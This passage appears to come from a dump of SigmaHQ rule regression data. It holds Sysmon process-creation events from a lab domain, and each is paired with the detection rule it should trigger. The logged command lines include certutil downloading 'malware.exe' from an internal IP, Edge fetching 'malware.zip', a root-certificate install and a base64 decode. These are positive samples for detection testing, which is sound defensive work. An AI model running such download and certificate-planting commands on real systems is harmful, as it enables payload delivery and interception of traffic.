    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:30:09.492105Z\"\n        }\n      },\n      \"EventRecordID\": 33024467,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:30:09.480\",\n      \"ProcessGuid\": \"5AA13A44-AF01-68FE-535E-000000004002\",\n      \"ProcessId\": 2536,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --load-extension=\\\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\HHe2lr\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml",
    "content": "id: 78e88bc4-deea-488e-a27f-b4d9d07d3a72\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 27ba3207-dd30-4812-abbf-5d20c57d474e\n      title: Suspicious Chromium Browser Instance Executed With Custom Extension\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:34:35.016637Z\"\n        }\n      },\n      \"EventRecordID\": 33119645,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:34:35.002\",\n      \"ProcessGuid\": \"5AA13A44-B00B-68FE-9F5E-000000004002\",\n      \"ProcessId\": 4584,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n      \"FileVersion\": \"141.0.3537.99\",\n      \"Description\": \"Microsoft Edge\",\n      \"Product\": \"Microsoft Edge\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msedge.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\"  \\\"http://10.0.1.14/malware.zip\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml",
    "content": "id: c7f0da2b-2eb9-46ee-abd0-d2f8e3c81975\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 94771a71-ba41-4b6e-a757-b531372eaab6\n      title: File Download From Browser Process Via Inline URL\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/94771a71-ba41-4b6e-a757-b531372eaab6.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:39:33.565515Z\"\n        }\n      },\n      \"EventRecordID\": 33232425,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:39:33.564\",\n      \"ProcessGuid\": \"5AA13A44-B135-68FE-035F-000000004002\",\n      \"ProcessId\": 10712,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\",\n      \"FileVersion\": \"128.14.0\",\n      \"Description\": \"Tor Browser\",\n      \"Product\": \"Tor Browser\",\n      \"Company\": \"Mozilla Corporation\",\n      \"OriginalFileName\": \"firefox.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"SHA1=9D317F48BA264346D1BA2DA10B0893B156FA69BF,MD5=66D34277F992DB4CA8561FD1A5C483E4,SHA256=683574EBC203C630AF98256516D7CBC50E270E7C5A56E1D46CB9CA671B3D9F32,IMPHASH=EEC7642CF938691D739D1F9BED0DF74D\",\n      \"ParentProcessGuid\": \"5AA13A44-B135-68FE-025F-000000004002\",\n      \"ParentProcessId\": 1292,\n      \"ParentImage\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Tor Browser\\\\Browser\\\\firefox.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml",
    "content": "id: 8e750cec-bc57-4b20-bd0a-006733558c56\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c\n      title: Tor Client/Browser Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T16:54:23.873276Z\"\n        }\n      },\n      \"EventRecordID\": 11383720,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 16:54:23.866\",\n      \"ProcessGuid\": \"5AA13A44-00BF-68FD-3F35-000000004002\",\n      \"ProcessId\": 8592,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -addstore -f root C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\cert.cer\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml",
    "content": "id: 5969ddb0-b4ab-47c9-a12b-471d6c6551c8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: d2125259-ddea-4c1c-9c22-977eb5b29cf0\n      title: New Root Certificate Installed Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation/d2125259-ddea-4c1c-9c22-977eb5b29cf0.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T16:56:16.019794Z\"\n        }\n      },\n      \"EventRecordID\": 11418519,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 16:56:16.013\",\n      \"ProcessGuid\": \"5AA13A44-0130-68FD-4E35-000000004002\",\n      \"ProcessId\": 5112,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil  -decode file.base64 file-decoded.ext\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/info.yml",
    "content": "id: e582dfce-5cb3-4991-9719-9a336eb90a6f\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7\n      title: File Decoded From Base64/Hex Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_decode/cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:02:36.900637Z\"\n        }\n      },\n      \"EventRecordID\": 11537869,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:02:36.894\",\n      \"ProcessGuid\": \"5AA13A44-02AC-68FD-7A35-000000004002\",\n      \"ProcessId\": 6484,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/info.yml",
    "content": "id: ee435dcb-08cb-4de1-bb70-bdd27cf0dae9\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b\n      title: Suspicious Download Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download/19b08b1c-861d-4e75-a1ef-ea0c1baf202b.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:01:06.116464Z\"\n        }\n      },\n      \"EventRecordID\": 11507958,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:01:06.109\",\n      \"ProcessGuid\": \"5AA13A44-0252-68FD-7235-000000004002\",\n      \"ProcessId\": 6432,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f http://10.0.1.14/malware.exe malware-ctl.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml",
    "content": "id: 76e024fd-9064-46ae-85f8-c524dc6b3492\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829\n      title: Suspicious File Downloaded From Direct IP Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip/13e6fe51-d478-4c7e-b0f2-6da9b400a829.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-25T17:02:36.900637Z\"\n        }\n      },\n      \"EventRecordID\": 11537869,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-25 17:02:36.894\",\n      \"ProcessGuid\": \"5AA13A44-02AC-68FD-7A35-000000004002\",\n      \"ProcessId\": 6484,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\certutil.exe\",\n      \"FileVersion\": \"10.0.20348.4163 (WinBuild.160101.0800)\",\n      \"Description\": \"CertUtil.exe\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CertUtil.exe\",\n      \"CommandLine\": \"certutil.exe  -urlcache -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1001.002/T1001.002.yaml atomic.yaml\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734\",\n      \"ParentProcessGuid\": \"5AA13A44-0FEC-68FC-281E-000000004002\",\n      \"ParentProcessId\": 6304,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml",
    "content": "id: 507f6de5-f414-4825-b1a3-e8909fdc8700\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794\n      title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/42a5f1e7-9603-4f6d-97ae-3f37d130d794.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_certutil_encode/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a.json",
